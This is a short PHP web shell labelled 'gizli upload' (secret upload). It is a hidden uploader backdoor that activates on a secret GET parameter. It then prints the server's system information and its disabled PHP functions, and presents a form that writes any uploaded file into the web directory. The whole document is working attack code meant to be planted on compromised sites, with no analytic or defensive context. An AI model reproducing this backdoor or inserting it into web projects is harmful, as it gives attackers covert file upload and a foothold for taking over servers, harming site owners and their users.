1. <?php
  2. if(isset($_GET["lav3y"]))
  3. {
  4. echo"<font color=#ffffff>".php_uname()."";
  5. print "\n";$disable_functions = @ini_get("disable_functions");
  6. echo "<br>DisablePHP=".$disable_functions; print "\n";
  7. echo"<br><form method=post enctype=multipart/form-data>";
  8. echo"<input type=file name=f><input name=k type=submit id=k value=upload><br>";
  9. if($_POST["k"]==upload)
  10. { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
  11. echo"<b>".$_FILES["f"]["name"];
  12. }else{
  13. echo"<b>SpyHackerZ";
  14. }
  15. }
  16. }

gizli upload